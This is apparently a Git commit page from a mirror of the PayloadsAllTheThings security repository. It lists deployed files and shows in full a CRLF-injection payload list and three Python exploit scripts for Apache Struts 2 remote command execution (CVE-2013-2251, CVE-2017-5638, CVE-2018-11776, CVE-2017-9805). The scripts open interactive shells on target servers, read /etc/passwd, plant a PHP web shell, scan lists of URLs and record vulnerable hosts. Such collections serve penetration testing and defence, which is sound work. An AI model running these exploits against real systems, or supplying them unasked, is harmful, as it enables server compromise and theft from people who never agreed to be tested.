wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-09 11:46:14 +02:00
Code Issues Releases Activity

Deployed 9571306 with MkDocs version: 1.5.3

This commit is contained in:
Swk 2024-04-05 13:53:49 +00:00
commit c5b83becd7
575 changed files with 791669 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
.nojekyll Normal file
View File

5595
404.html Normal file
View File

File diff suppressed because one or more lines are too long

3571
API Key Leaks/Files/MachineKeys.txt Normal file
View File

File diff suppressed because it is too large Load Diff

6329
API Key Leaks/index.html Normal file
View File

File diff suppressed because one or more lines are too long

6051
AWS Amazon Bucket S3/index.html Normal file
View File

File diff suppressed because one or more lines are too long

6548
Account Takeover/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5938
Argument Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5872
Business Logic Errors/index.html Normal file
View File

File diff suppressed because one or more lines are too long

6337
CICD/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5829
CONTRIBUTING/index.html Normal file
View File

File diff suppressed because one or more lines are too long

6395
CORS Misconfiguration/index.html Normal file
View File

File diff suppressed because one or more lines are too long

17
CRLF Injection/crlfinjection.txt Normal file
View File

@ -0,0 +1,17 @@
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

5937
CRLF Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

BIN
CSRF Injection/Images/CSRF-CheatSheet.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 407 KiB

6256
CSRF Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5811
CSV Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

215
CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py Normal file
View File

@ -0,0 +1,215 @@
#!/usr/bin/python
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
from builtins import str
import urllib.request, urllib.error, urllib.parse
import time
import sys
import os
import subprocess
import requests
import readline
import urllib.parse
RED = '\033[1;31m'
BLUE = '\033[94m'
BOLD = '\033[1m'
GREEN = '\033[32m'
OTRO = '\033[36m'
YELLOW = '\033[33m'
ENDC = '\033[0m'
def cls():
os.system(['clear', 'cls'][os.name == 'nt'])
cls()
logo = BLUE+'''
___ _____ ___ _ _ _____ ___
( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\
| (_(_) | | | (_) )| | | | | | | (_(_)
`\__ \ | | | , / | | | | | | `\__ \
( )_) | | | | |\ \ | (_) | | | ( )_) |
`\____) (_) (_) (_)(_____) (_) `\____)
=[ Command Execution v3]=
By @s1kr10s
'''+ENDC
print(logo)
print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
host = input(BOLD+" [+] HOST: "+ENDC)
if len(host) > 0:
if host.find("https://") != -1 or host.find("http://") != -1:
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
def exploit(comando):
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploit
def exploit2(comando):
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit2
def exploit3(comando):
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
return exploit3
def pwnd(shellfile):
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploitfile
def validador():
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
return arr_lin_win
#def reversepl(ip,port):
# print "perl"
#def reversepy(ip,port):
# print "python"
# CVE-2013-2251 ---------------------------------------------------------------------------------
try:
response = ''
response = urllib.request.urlopen(host+poc)
except:
print(RED+" Servidor no responde\n"+ENDC)
exit(0)
print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
if response.read().find("mamalo") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
#print BOLD+" * [SHELL REVERSA]"+ENDC
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1:
separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
espacio = separador.split(' ')
comando = "','".join(espacio)
if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
print("\n"+shell.read())
elif espacio[0] == 'pwnd':
pathsave=input("path EJ:/tmp/: ")
if espacio[1] == 'php':
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
urllib.request.urlopen(host+pwnd(str(shellfile)))
shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
if shell.read().find(pathsave+"status.php") != -1:
print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
else:
print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
# CVE-2017-5638 ---------------------------------------------------------------------------------
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
x = 0
while x < len(validador()):
valida = validador()[x]
try:
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
result = urllib.request.urlopen(req).read()
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
while 1:
try:
separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
result = urllib.request.urlopen(req).read()
print("\n"+result)
except:
exit(0)
else:
x = len(validador())
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
pass
x=x+1
# CVE-2018-11776 ---------------------------------------------------------------------------------
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
x = 0
while x < len(validador()):
#Filtramos la url solo dominio
url = host.replace('#', '%23')
url = host.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urllib.parse.urlparse(url).scheme
site = scheme + '://' + urllib.parse.urlparse(url).netloc
#Filtramos la url solo path
file_path = urllib.parse.urlparse(url).path
if (file_path == ''):
file_path = '/'
valida = validador()[x]
try:
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1:
separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
espacio = separador.split(' ')
comando = "%20".join(espacio)
shell = urllib.request.urlopen(host+exploit3(str(comando)))
print("\n"+shell.read())
else:
x = len(validador())
exit(0)
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
pass
x=x+1
else:
print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
exit(0)
else:
print(RED+" Debe Ingresar una Url\n"+ENDC)
exit(0)

326
CVE Exploits/Apache Struts 2 CVE-2017-9805.py Normal file
View File

@ -0,0 +1,326 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2017-9805 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code is based on:
# https://github.com/rapid7/metasploit-framework/pull/8924
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
# *****************************************************
from __future__ import print_function
from builtins import str
import argparse
import requests
import sys
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
action='store',
default='echo test > /tmp/struts-pwn')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
url = args.url if args.url else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
def url_prepare(url):
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str('http') + str('://') + str(url)
return(url)
def exploit(url, cmd, dont_print_status_on_console=False):
url = url_prepare(url)
if dont_print_status_on_console is False:
print('\n[*] URL: %s' % (url))
print('[*] CMD: %s' % (cmd))
cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
payload = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{0}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
""".format(cmd)
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Referer': str(url),
'Content-Type': 'application/xml',
'Accept': '*/*'
}
timeout = 3
try:
output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
except Exception as e:
print("EXCEPTION::::--> " + str(e))
output = 'ERROR'
return(output)
def check(url):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
initial_request = exploit(url, "", dont_print_status_on_console=True)
if initial_request == "ERROR":
result = False
print("The host does not respond as expected.")
return(result)
payload_sleep_based_10seconds = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
AAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>newTransformer</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
"""
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Referer': str(url),
'Content-Type': 'application/xml',
'Accept': '*/*'
}
timeout = 8
try:
requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
# if the response returned before the request timeout.
# then, the host should not be vulnerable.
# The request should return > 10 seconds, while the timeout is 8.
result = False
except Exception:
result = True
return(result)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
result = check(url)
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
print(output)
else:
exploit(url, cmd)
print("[$] Request sent.")
print("[.] If the host is vulnerable, the command will be executed in the background.")
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), 'r')
URLs_List = f_file.read().replace('\r', '').split('\n')
try:
URLs_List.remove('')
except ValueError:
pass
f_file.close()
except Exception as e:
print('Error: There was an error in reading list file.')
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
result = check(url)
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
print(output)
else:
exploit(url, cmd)
print("[$] Request sent.")
print("[.] If the host is vulnerable, the command will be executed in the background.")
print('[%] Done.')
if __name__ == '__main__':
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print('\nKeyboardInterrupt Detected.')
print('Exiting...')
exit(0)

231
CVE Exploits/Apache Struts 2 CVE-2018-11776.py Normal file
View File

@ -0,0 +1,231 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
import argparse
import random
import requests
import sys
try:
from urllib import parse as urlparse
except ImportError:
import urllib.parse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'id')",
action='store',
default='id')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Accept': '*/*'
}
timeout = 3
def parse_url(url):
"""
Parses the URL.
"""
# url: http://example.com/demo/struts2-showcase/index.action
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urllib.parse.urlparse(url).scheme
# Site: http://example.com
site = scheme + '://' + urllib.parse.urlparse(url).netloc
# FilePath: /demo/struts2-showcase/index.action
file_path = urllib.parse.urlparse(url).path
if (file_path == ''):
file_path = '/'
# Filename: index.action
try:
filename = url.split('/')[-1]
except IndexError:
filename = ''
# File Dir: /demo/struts2-showcase/
file_dir = file_path.rstrip(filename)
if (file_dir == ''):
file_dir = '/'
return({"site": site,
"file_dir": file_dir,
"filename": filename})
def build_injection_inputs(url):
"""
Builds injection inputs for the check.
"""
parsed_url = parse_url(url)
injection_inputs = []
url_directories = parsed_url["file_dir"].split("/")
try:
url_directories.remove("")
except ValueError:
pass
for i in range(len(url_directories)):
injection_entry = "/".join(url_directories[:i])
if not injection_entry.startswith("/"):
injection_entry = "/%s" % (injection_entry)
if not injection_entry.endswith("/"):
injection_entry = "%s/" % (injection_entry)
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
injection_entry += parsed_url["filename"]
injection_inputs.append(injection_entry)
return(injection_inputs)
def check(url):
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
multiplication_value = random_value * random_value
injection_points = build_injection_inputs(url)
parsed_url = parse_url(url)
print("[%] Checking for CVE-2018-11776")
print("[*] URL: %s" % (url))
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
attempts_counter = 0
for injection_point in injection_points:
attempts_counter += 1
print("[%s/%s]" % (attempts_counter, len(injection_points)))
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
continue
if "Location" in list(resp.headers.keys()):
if str(multiplication_value) in resp.headers['Location']:
print("[*] Status: Vulnerable!")
return(injection_point)
print("[*] Status: Not Affected.")
return(None)
def exploit(url, cmd):
parsed_url = parse_url(url)
injection_point = check(url)
if injection_point is None:
print("[%] Target is not vulnerable.")
return(0)
print("[%] Exploiting...")
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
return(1)
print("[%] Response:")
print(resp.text)
return(0)
